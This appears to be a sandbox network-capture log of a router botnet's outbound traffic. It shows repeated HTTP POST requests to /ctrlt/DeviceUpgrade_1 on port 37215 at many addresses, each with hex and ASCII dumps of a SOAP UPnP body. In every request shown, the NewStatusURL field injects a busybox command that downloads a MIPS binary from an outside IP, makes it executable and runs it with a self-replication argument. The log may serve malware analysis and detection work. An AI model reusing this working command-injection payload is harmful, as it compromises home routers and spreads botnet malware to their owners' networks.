                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1077192.168.2.234287641.109.61.637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298607111 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1078192.168.2.2350844197.196.211.13037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298743963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1079192.168.2.2341550157.88.37.20837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298748970 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1080192.168.2.2340506198.96.188.13137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298772097 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1081192.168.2.233589252.227.171.17237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298784018 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1082192.168.2.2337856157.133.111.6937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298799038 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1083192.168.2.2351642157.215.78.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298808098 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1084192.168.2.2340784197.29.60.11837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298825026 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1085192.168.2.2346118197.189.16.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298832893 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1086192.168.2.2342160157.76.164.16137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298846960 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
